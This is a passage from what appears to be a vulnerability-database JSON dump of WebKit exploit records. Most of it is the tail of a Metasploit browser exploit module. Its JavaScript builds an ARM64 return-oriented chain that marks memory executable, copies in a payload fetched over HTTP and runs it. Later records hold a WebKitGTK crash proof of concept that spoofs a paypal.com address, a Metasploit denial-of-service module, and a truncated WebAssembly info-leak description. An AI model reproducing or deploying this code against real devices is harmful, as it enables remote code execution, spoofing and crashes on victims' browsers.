\n} \nif(lookup != null) \n{ \nfsyms(memory, base, segs, lookup, syms); \n} \n} \n \nvar vals = Object.keys(libs).map(function(key) { \nreturn libs[key]; \n}); \nvar k = vals.reduce(function(p,c){ c.forEach(function(e){ p.push(e) });return p; }, []); \nfor(var i = 0; i < k.length; ++i) \n{ \nvar s = k[i]; \nif(syms[s] == null) \n{ \nfail(s); \n} \nsyms[s] = Add(syms[s], cache_slide); \n} \nk = Object.keys(opcodes); \nfor(var i = 0; i < k.length; ++i) \n{ \nvar s = k[i]; \nif(gadgets[s] == null) \n{ \nfail(s); \n} \n} \n \noffsets = {} \noffsets[\"regloader\"] = gadgets[\"regloader\"]; \noffsets[\"dispatch\"] = gadgets[\"dispatch\"]; \noffsets[\"stackloader\"] = gadgets[\"stackloader\"]; \noffsets[\"ldrx8\"] = gadgets[\"ldrx8\"]; \noffsets[\"movx4\"] = gadgets[\"movx4\"]; \noffsets[\"__longjmp\"] = syms[\"__longjmp\"]; \noffsets[\"__kernelrpc_mach_vm_protect_trap\"] = syms[\"__kernelrpc_mach_vm_protect_trap\"]; \noffsets[\"__platform_memmove\"] = syms[\"__platform_memmove\"]; \noffsets[\"_dlopen\"] = syms[\"_dlopen\"]; \noffsets[\"_dlsym\"] = syms[\"_dlsym\"]; \noffsets[\"_mach_task_self_\"] = syms[\"_mach_task_self_\"]; \noffsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"]; \noffsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"]; \noffsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] = syms[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]; \n \nif (offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] != null) { \noffsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], 8); \n} \n#{ ios_11 ? ' \nif (offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] != null) { \noffsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], 8); \n}' : ''} \n \n#{dump_offsets} \n \n} \n \n \nvar regloader = offsets[\"regloader\"]; \nvar dispatch = offsets[\"dispatch\"]; \nvar stackloader = offsets[\"stackloader\"]; \nvar longjmp = offsets[\"__longjmp\"]; \nvar mach_vm_protect = offsets[\"__kernelrpc_mach_vm_protect_trap\"]; \nvar memmove = offsets[\"__platform_memmove\"]; \nvar dlopen = offsets[\"_dlopen\"]; \nvar dlsym = offsets[\"_dlsym\"]; \nvar task_self = offsets[\"_mach_task_self_\"] \nvar endOfFixedMem = offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"]; \nvar startOfFixedMem = offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"]; \n \nvar ldrx8 = offsets[\"ldrx8\"]; // might be null \nvar movx4 = offsets[\"movx4\"]; // might be null \n \nvar mach_task_self_ = new Int64(memory.readInt64(task_self).lo()); \nvar memPoolEnd = memory.readInt64(endOfFixedMem); \n \nvar memPoolStart = Int64.Zero; \nif (startOfFixedMem) { \nmemPoolStart = memory.readInt64(startOfFixedMem); \n} \n \nvar jitWriteSeparateHeaps = Int64.Zero; \nif (offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]) { \njitWriteSeparateHeaps = memory.readInt64(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]); \n} \n \nvar shsz = new Int64(\"0x100000\"); \nvar paddr = memory.readInt64(Add(stage1.addrof(payload), 0x10)); \nvar codeAddr = Sub(memPoolEnd, shsz); \ncodeAddr = Sub(codeAddr, codeAddr.lo() & 0x3fff); \n \nmemory.writeInt64(Add(vtab, 0x18), longjmp); \nmemory.writeInt64(Add(el_addr, 0x58), stackloader); // x30 (gadget) \n \nvar arrsz = 0x100000, \noff = 0x1000; \nvar arr = new Uint32Array(arrsz); \nvar stack = memory.readInt64(Add(stage1.addrof(arr), 0x10)); \n \nvar pos = arrsz - off; \n \nvar add_call_llvm = function(func, x0, x1, x2, x3, x4, jump_to) { \nx4 = x4 || Int64.Zero \n \n// in stackloader: \narr[pos++] = 0xdead0010; // unused \narr[pos++] = 0xdead0011; // unused \narr[pos++] = 0xdead0012; // unused \narr[pos++] = 0xdead0013; // unused \narr[pos++] = dispatch.lo(); // x28 (gadget for regloader) \narr[pos++] = dispatch.hi(); // x28 (gadget for regloader) \narr[pos++] = 0xdead0014; // x27 (unused) \narr[pos++] = 0xdead0015; // x27 (unused) \narr[pos++] = x4.lo(); // x26 == x4 (arg5) \narr[pos++] = x4.hi(); // x26 == x4 (arg5) \narr[pos++] = x3.lo(); // x25 == x3 (arg4) \narr[pos++] = x3.hi(); // x25 == x3 (arg4) \narr[pos++] = x2.lo(); // x24 == x2 (arg3) \narr[pos++] = x2.hi(); // x24 == x2 (arg3) \narr[pos++] = x0.lo(); // x23 == x0 (arg1) \narr[pos++] = x0.hi(); // x23 == x0 (arg1) \narr[pos++] = x1.lo(); // x22 == x1 (arg2) \narr[pos++] = x1.hi(); // x22 == x1 (arg2) \narr[pos++] = func.lo(); // x21 (func) \narr[pos++] = func.hi(); // x21 (func) \narr[pos++] = 0xdbad0018; // x20 (unused) \narr[pos++] = 0xdbad0019; // x20 (unused) \narr[pos++] = 0xdead001a; // x19 (unused) \narr[pos++] = 0xdead001b; // x19 (unused) \nvar tmppos = pos; \narr[pos++] = Add(stack, tmppos*4 + 0x40).lo(); // x29 \narr[pos++] = Add(stack, tmppos*4 + 0x40).hi(); // x29 \narr[pos++] = regloader.lo(); // x30 (first gadget) \narr[pos++] = regloader.hi(); // x30 (first gadget) \n \n// after dispatch: \narr[pos++] = 0xdead0020; // unused \narr[pos++] = 0xdead0021; // unused \narr[pos++] = 0xdead0022; // unused \narr[pos++] = 0xdead0023; // unused \narr[pos++] = 0xdead0024; // x22 (unused) \narr[pos++] = 0xdead0025; // x22 (unused) \narr[pos++] = 0xdead0026; // x21 (unused) \narr[pos++] = 0xdead0027; // x21 (unused) \narr[pos++] = 0xdead0028; // x20 (unused) \narr[pos++] = 0xdead0029; // x20 (unused) \narr[pos++] = 0xdead002a; // x19 (unused) \narr[pos++] = 0xdead002b; // x19 (unused) \ntmppos = pos; \narr[pos++] = Add(stack, tmppos*4 + 0x70).lo(); // x29 \narr[pos++] = Add(stack, tmppos*4 + 0x70).hi(); // x29 \narr[pos++] = jump_to.lo(); // x30 (gadget) \narr[pos++] = jump_to.hi(); // x30 (gadget) \n} \n \nvar add_call_via_x8 = function(func, x0, x1, x2, x3, x4, jump_to) { \n//alert(`add_call_via_x8: ${func}(${x0}, ${x1}, ${x2}, ${x3}, ${x4}, ${jump_to})`); \n//x4 = x4 || Int64.One \n// in stackloader: \narr[pos++] = 0xdead0010; // unused \narr[pos++] = 0xdead0011; // unused \narr[pos++] = 0xdead0012; // unused \narr[pos++] = 0xdead0013; // unused \narr[pos++] = 0xdead1101; // x28 (unused) \narr[pos++] = 0xdead1102; // x28 (unused) \narr[pos++] = 0xdead0014; // x27 == x6 (unused) \narr[pos++] = 0xdead0015; // x27 == x6 (unused) \narr[pos++] = 0xdead0016; // x26 (unused) \narr[pos++] = 0xdead0017; // x26 (unused) \narr[pos++] = x3.lo(); // x25 == x3 (arg4) \narr[pos++] = x3.hi(); // x25 == x3 (arg4) \narr[pos++] = x0.lo(); // x24 == x0 (arg1) \narr[pos++] = x0.hi(); // x24 == x0 (arg1) \narr[pos++] = x2.lo(); // x23 == x2 (arg3) \narr[pos++] = x2.hi(); // x23 == x2 (arg3) \narr[pos++] = x3.lo(); // x22 == x3 (arg4) \narr[pos++] = x3.hi(); // x22 == x3 (arg4) \narr[pos++] = func.lo(); // x21 (target for dispatch) \narr[pos++] = func.hi(); // x21 (target for dispatch) \narr[pos++] = 0xdead0018; // x20 (unused) \narr[pos++] = 0xdead0019; // x20 (unused) \nvar tmppos = pos; \narr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19]) \narr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19]) \narr[pos++] = 0xdead001c; // x29 (unused) \narr[pos++] = 0xdead001d; // x29 (unused) \narr[pos++] = ldrx8.lo(); // x30 (next gadget) \narr[pos++] = ldrx8.hi(); // x30 (next gadget) \n \n// in ldrx8 \nif (x4) { \narr[pos++] = stackloader.lo(); \narr[pos++] = stackloader.hi(); \n} else { \narr[pos++] = dispatch.lo(); // x8 (target for regloader) \narr[pos++] = dispatch.hi(); // x8 (target for regloader) \n} \narr[pos++] = 0xdead1401; // (unused) \narr[pos++] = 0xdead1402; // (unused) \narr[pos++] = 0xdead1301; // x20 (unused) \narr[pos++] = 0xdead1302; // x20 (unused) \narr[pos++] = x1.lo(); // x19 == x1 (arg2) \narr[pos++] = x1.hi(); // x19 == x1 (arg2) \narr[pos++] = 0xdead1201; // x29 (unused) \narr[pos++] = 0xdead1202; // x29 (unused) \narr[pos++] = regloader.lo(); // x30 (next gadget) \narr[pos++] = regloader.hi(); // x30 (next gadget) \n \n// in regloader \n// NOTE: REGLOADER DOES NOT ADJUST SP! \n// sometimes i didn't get expected value in x4 \n// and i have no fucking idea why \n// usleep likely did the trick, but I would still keep the code \n// with movx4 \n//arr[pos++] = x4.lo() // x4 (should be -- but see lines above) \n//arr[pos++] = x4.hi() // x4 (should be -- but see lines above) \n \nif (x4) { \n// in stackloader: \narr[pos++] = 0xdaad0010; // unused \narr[pos++] = 0xdaad0011; // unused \narr[pos++] = 0xdaad0012; // unused \narr[pos++] = 0xdaad0013; // unused \narr[pos++] = 0xdaad1101; // x28 (unused) \narr[pos++] = 0xdaad1102; // x28 (unused) \narr[pos++] = 0xdaad0014; // x27 == x6 (unused) \narr[pos++] = 0xdaad0015; // x27 == x6 (unused) \narr[pos++] = 0xdaad0016; // x26 (unused) \narr[pos++] = 0xdaad0017; // x26 (unused) \narr[pos++] = 0xdaad0018; // x25 (unused) \narr[pos++] = 0xdaad0019; // x25 (unused) \narr[pos++] = 0xdaad00f0; // x24 (unused) \narr[pos++] = 0xdaad00f1; // x24 (unused) \narr[pos++] = 0xdaad00f2; // x23 (unused) \narr[pos++] = 0xdaad00f3; // x23 (unused) \narr[pos++] = 0xdaad00f4; // x22 (unused) \narr[pos++] = 0xdaad00f5; // x22 (unused) \narr[pos++] = func.lo(); // x21 (target for dispatch) \narr[pos++] = func.hi(); // x21 (target for dispatch) \narr[pos++] = 0xdaad0018; // x20 (unused) \narr[pos++] = 0xdaad0019; // x20 (unused) \ntmppos = pos; \narr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19]) \narr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19]) \narr[pos++] = 0xdaad001c; // x29 (unused) \narr[pos++] = 0xdaad001d; // x29 (unused) \narr[pos++] = ldrx8.lo(); // x30 (next gadget) \narr[pos++] = ldrx8.hi(); // x30 (next gadget) \n \n// in ldrx8 \narr[pos++] = dispatch.lo(); // x8 (target for movx4) \narr[pos++] = dispatch.hi(); // x8 (target for movx4) \narr[pos++] = 0xdaad1401; // (unused) \narr[pos++] = 0xdaad1402; // (unused) \narr[pos++] = x4.lo(); // x20 == x4 (arg5) \narr[pos++] = x4.hi(); // x20 == x4 (arg5) \narr[pos++] = 0xdaad1301; // x19 (unused) \narr[pos++] = 0xdaad1302; // x19 (unused) \narr[pos++] = 0xdaad1201; // x29 (unused) \narr[pos++] = 0xdaad1202; // x29 (unused) \narr[pos++] = movx4.lo(); // x30 (next gadget) \narr[pos++] = movx4.hi(); // x30 (next gadget) \n} \n \n// after dispatch: \n \n// keep only one: these or 0xdeaded01 \narr[pos++] = 0xdead0022; // unused \narr[pos++] = 0xdead0023; // unused \n \narr[pos++] = 0xdead0022; // unused \narr[pos++] = 0xdead0023; // unused \narr[pos++] = 0xdead0024; // x22 (unused) \narr[pos++] = 0xdead0025; // x22 (unused) \narr[pos++] = 0xdead0026; // x21 (unused) \narr[pos++] = 0xdead0027; // x21 (unused) \narr[pos++] = 0xdead0028; // x20 (unused) \narr[pos++] = 0xdead0029; // x20 (unused) \narr[pos++] = 0xdead002a; // x19 (unused) \narr[pos++] = 0xdead002b; // x19 (unused) \narr[pos++] = 0xdead002c; // x29 (unused) \narr[pos++] = 0xdead002d; // x29 (unused) \narr[pos++] = jump_to.lo(); // x30 (gadget) \narr[pos++] = jump_to.hi(); // x30 (gadget) \n} \n \nvar add_call = function(func, x0, x1, x2, x3, x4, jump_to) { \nx0 = x0 || Int64.Zero \nx1 = x1 || Int64.Zero \nx2 = x2 || Int64.Zero \nx3 = x3 || Int64.Zero \njump_to = jump_to || stackloader \n \nreturn (ldrx8 ? add_call_via_x8 : add_call_llvm)( \nfunc, x0, x1, x2, x3, x4, jump_to \n) \n} \n \n#{ios_11 ? ' \nif (jitWriteSeparateHeaps.lo() || jitWriteSeparateHeaps.hi()) { \nadd_call(jitWriteSeparateHeaps \n, Sub(codeAddr, memPoolStart) // off \n, paddr // src \n, shsz // size \n); \n} else { \nfail(\"jitWrite\"); \n} \n' : ' \nadd_call(mach_vm_protect, \nmach_task_self_, // task \ncodeAddr, // addr \nshsz, // size \nnew Int64(0), // set maximum \nnew Int64(7) // prot (RWX) \n); \n \nadd_call(memmove, \ncodeAddr, // dst \npaddr, // src \nshsz // size \n); \n'} \n \nadd_call(codeAddr, \ndlopen, \ndlsym, \njitWriteSeparateHeaps, \nmemPoolStart, \nmemPoolEnd, \n); \n \nfor(var i = 0; i < 0x20; ++i) \n{ \narr[pos++] = 0xde00c0de + (i<<16); \n} \n \nvar sp = Add(stack, (arrsz - off) * 4); \nmemory.writeInt64(Add(el_addr, 0x60), Add(sp, 0x60)); // x29 \nmemory.writeInt64(Add(el_addr, 0x68), sp); // x2 (copied into sp) \n \n// trigger \n//print(\"u rdy?\") \nwrapper.addEventListener(\"click\", function(){}); \n \n} \n \n#{get_mem_rw} \n \nfunction go() { \ntry { \nvar req = new XMLHttpRequest; \nreq.open(\"GET\", \"exploit\"); \nreq.responseType = \"arraybuffer\"; \nreq.addEventListener(\"load\", function() { \ntry { \nif (req.responseType != \"arraybuffer\") throw \"y u no blob\"; \npayload.set(new Uint8Array(req.response), 0x0); \npwn(); \n} catch (e) { \nfail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\")) \n} \n}); \nreq.addEventListener(\"error\", function(ev) { \nfail(ev) \n}); \nreq.send() \n} catch (e) { \nfail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\")) \n} \n}; \n \ngo(); \n \n</script> \n</body> \n</html> \n^ \nunless datastore['DEBUG_EXPLOIT'] \nhtml.gsub!(/\\/\\/.*$/, '') # strip comments \nhtml.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*); \nend \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'}) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/153148/webkit_createthis.rb.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:55", "description": "\nWebKitGTK+ 2.21.3 - WebKitFaviconDatabase Denial of Service (Metasploit)", "edition": 1, "published": "2018-06-11T00:00:00", "title": "WebKitGTK+ 2.21.3 - WebKitFaviconDatabase Denial of Service (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-11T00:00:00", "id": "EXPLOITPACK:031DF743451446CD96638EB1AA5E6C47", "href": "", "sourceData": "##\n# Title: WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS\n# Author: Dhiraj Mishra\n# Date: 2018-06-11\n# CVE: 2018-11646\n#\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => \"WebKitGTK+ WebKitFaviconDatabase DoS\",\n 'Description' => %q(\n This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\n If successful, it could lead to application crash, resulting in denial of service.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Dhiraj Mishra', # Original discovery, disclosure\n 'Hardik Mehta', # Original discovery, disclosure\n 'Zubin Devnani', # Original discovery, disclosure\n 'Manuel Caballero' #JS Code\n ],\n 'References' => [\n ['EDB', '44842'],\n ['CVE', '2018-11646'],\n ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],\n ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']\n ],\n 'DisclosureDate' => 'Jun 03 2018',\n 'Actions' => [[ 'WebServer' ]],\n 'PassiveActions' => [ 'WebServer' ],\n 'DefaultAction' => 'WebServer'\n )\n )\n end\n\n def run\n exploit # start http server\n end\n\n def setup\n @html = <<-JS\n<script type=\"text/javascript\">\n win = window.open(\"WIN\", \"WIN\");\n window.open(\"http://example.com/\", \"WIN\");\n win.document.execCommand('stop');\n win.document.write(\"HelloWorld\");\n win.document.close();\n</script>\n JS\n end\n\n def on_request_uri(cli, _request)\n print_status('Sending response')\n send_response(cli, @html)\n end\nend", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:55", "description": "\nWebKitGTK+ 2.21.3 - Crash (PoC)", "edition": 1, "published": "2018-06-05T00:00:00", "title": "WebKitGTK+ 2.21.3 - Crash (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-05T00:00:00", "id": "EXPLOITPACK:C7B5D1AF7C2C90DC97EDE10892A220CC", "href": "", "sourceData": "# Title: WebKitGTK+ < 2.21.3 - Crash (PoC) \n# Author: Dhiraj Mishra\n# Date: 2018-06-05\n# Software: https://webkitgtk.org/\n# CVE: CVE-2018-11646\n# Summary:\n# webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in \n# UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, \n# mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue.\n\n# PoC:\n\n<script>\nwin = window.open(\"sleep_one_second.php\", \"WIN\"); \nwindow.open(\"https://www.paypal.com\", \"WIN\"); \nwin.document.execCommand('Stop'); \nwin.document.write(\"Spoofed URL\"); \nwin.document.close();\n</script>\n\n\nBacktrace using fedora 27:\n\n#0 WTF::StringImpl::rawHash\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508\n#1 WTF::StringImpl::hasHash\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514\n#2 WTF::StringImpl::hash\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525\n#3 WTF::StringHash::hash\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73\n#9 WTF::HashMap, WTF::HashTraits >::get\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406\n#10 webkitFaviconDatabaseSetIconURLForPageURL\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193\n#11 webkitFaviconDatabaseSetIconForPageURL\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318\n#12 webkitWebViewSetIcon\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964\n#13 WTF::Function::performCallbackWithReturnValue\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108\n#15 WebKit::WebPageProxy::dataCallback\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083\n#16 WebKit::WebPageProxy::finishedLoadingIcon\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848\n#17 IPC::callMemberFunctionImpl::operator()\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68\n#29 WTF::RunLoop::::_FUN(gpointer)\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70\n#30 g_main_dispatch\nat gmain.c line 3148\n#31 g_main_context_dispatch\nat gmain.c line 3813\n#32 g_main_context_iterate\nat gmain.c line 3886\n#33 g_main_context_iteration\nat gmain.c line 3947x\n#34 g_application_run\nat gapplication.c line 2401\n#35 main\nat ../src/ephy-main.c line 432 \n\n\n# Reference's:\n# https://bugs.webkit.org/show_bug.cgi?id=186164\n# https://bugzilla.gnome.org/show_bug.cgi?id=795740", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2018-06-05T20:05:30", "description": "WebKitGTK+ < 2.21.3 - Crash (PoC). CVE-2018-11646. Local exploit for Linux platform", "published": "2018-06-05T00:00:00", "type": "exploitdb", "title": "WebKitGTK+ < 2.21.3 - Crash (PoC)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-05T00:00:00", "id": "EDB-ID:44842", "href": "https://www.exploit-db.com/exploits/44842/", "sourceData": "# Title: WebKitGTK+ < 2.21.3 - Crash (PoC) \r\n# Author: Dhiraj Mishra\r\n# Date: 2018-06-05\r\n# Software: https://webkitgtk.org/\r\n# CVE: CVE-2018-11646\r\n# Summary:\r\n# webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in \r\n# UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, \r\n# mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue.\r\n\r\n# PoC:\r\n\r\n<script>\r\nwin = window.open(\"sleep_one_second.php\", \"WIN\"); \r\nwindow.open(\"https://www.paypal.com\", \"WIN\"); \r\nwin.document.execCommand('Stop'); \r\nwin.document.write(\"Spoofed URL\"); \r\nwin.document.close();\r\n</script>\r\n\r\n\r\nBacktrace using fedora 27:\r\n\r\n#0 WTF::StringImpl::rawHash\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508\r\n#1 WTF::StringImpl::hasHash\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514\r\n#2 WTF::StringImpl::hash\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525\r\n#3 WTF::StringHash::hash\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73\r\n#9 WTF::HashMap, WTF::HashTraits >::get\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406\r\n#10 webkitFaviconDatabaseSetIconURLForPageURL\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193\r\n#11 webkitFaviconDatabaseSetIconForPageURL\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318\r\n#12 webkitWebViewSetIcon\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964\r\n#13 WTF::Function::performCallbackWithReturnValue\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108\r\n#15 WebKit::WebPageProxy::dataCallback\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083\r\n#16 WebKit::WebPageProxy::finishedLoadingIcon\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848\r\n#17 IPC::callMemberFunctionImpl::operator()\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68\r\n#29 WTF::RunLoop::::_FUN(gpointer)\r\nat /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70\r\n#30 g_main_dispatch\r\nat gmain.c line 3148\r\n#31 g_main_context_dispatch\r\nat gmain.c line 3813\r\n#32 g_main_context_iterate\r\nat gmain.c line 3886\r\n#33 g_main_context_iteration\r\nat gmain.c line 3947x\r\n#34 g_application_run\r\nat gapplication.c line 2401\r\n#35 main\r\nat ../src/ephy-main.c line 432 \r\n\r\n\r\n# Reference's:\r\n# https://bugs.webkit.org/show_bug.cgi?id=186164\r\n# https://bugzilla.gnome.org/show_bug.cgi?id=795740", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44842/"}, {"lastseen": "2018-06-11T23:41:12", "description": "WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS. CVE-2018-11646. Dos exploit for Linux platform", "published": "2018-06-11T00:00:00", "type": "exploitdb", "title": "WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11646"], "modified": "2018-06-11T00:00:00", "id": "EDB-ID:44876", "href": "https://www.exploit-db.com/exploits/44876/", "sourceData": "##\r\n# Title: WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS\r\n# Author: Dhiraj Mishra\r\n# Date: 2018-06-11\r\n# CVE: 2018-11646\r\n#\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => \"WebKitGTK+ WebKitFaviconDatabase DoS\",\r\n 'Description' => %q(\r\n This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\r\n If successful, it could lead to application crash, resulting in denial of service.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Dhiraj Mishra', # Original discovery, disclosure\r\n 'Hardik Mehta', # Original discovery, disclosure\r\n 'Zubin Devnani', # Original discovery, disclosure\r\n 'Manuel Caballero' #JS Code\r\n ],\r\n 'References' => [\r\n ['EDB', '44842'],\r\n ['CVE', '2018-11646'],\r\n ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],\r\n ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']\r\n ],\r\n 'DisclosureDate' => 'Jun 03 2018',\r\n 'Actions' => [[ 'WebServer' ]],\r\n 'PassiveActions' => [ 'WebServer' ],\r\n 'DefaultAction' => 'WebServer'\r\n )\r\n )\r\n end\r\n\r\n def run\r\n exploit # start http server\r\n end\r\n\r\n def setup\r\n @html = <<-JS\r\n<script type=\"text/javascript\">\r\n win = window.open(\"WIN\", \"WIN\");\r\n window.open(\"http://example.com/\", \"WIN\");\r\n win.document.execCommand('stop');\r\n win.document.write(\"HelloWorld\");\r\n win.document.close();\r\n</script>\r\n JS\r\n end\r\n\r\n def on_request_uri(cli, _request)\r\n print_status('Sending response')\r\n send_response(cli, @html)\r\n end\r\nend", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44876/"}, {"lastseen": "2018-06-08T18:24:41", "description": "WebKit - WebAssembly Compilation Info Leak. CVE-2018-4222. Dos exploit for Multiple platform", "published": "2018-06-08T00:00:00", "type": "exploitdb", "title": "WebKit - WebAssembly Compilation Info Leak", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-4222"], "modified": "2018-06-08T00:00:00", "id": "EDB-ID:44859", "href": "https://www.exploit-db.com/exploits/44859/", "sourceData": "<!--\r\nThere is an out-of-bounds read when compiling WebAssembly source buffers in WebKit. When a source buffer is compiled, it is first copied into a read-only buffer by the functuion getWasmBufferFromValue. This function returns the code buffer as follows:\r\n\r\nreturn arrayBufferView ? static_cast<uint8_t*>(arrayBufferView->vector()) : static_cast<uint8_t*>(arrayBuffer->impl()->data());\r\n\r\nIf the source buffer is a view (DataView or TypedArray), arrayBufferView->vector() is returned. The vector() method returns the start of the data in the buffer, including any offset. However, the function createSourceBufferFromValue copies the output of this function as 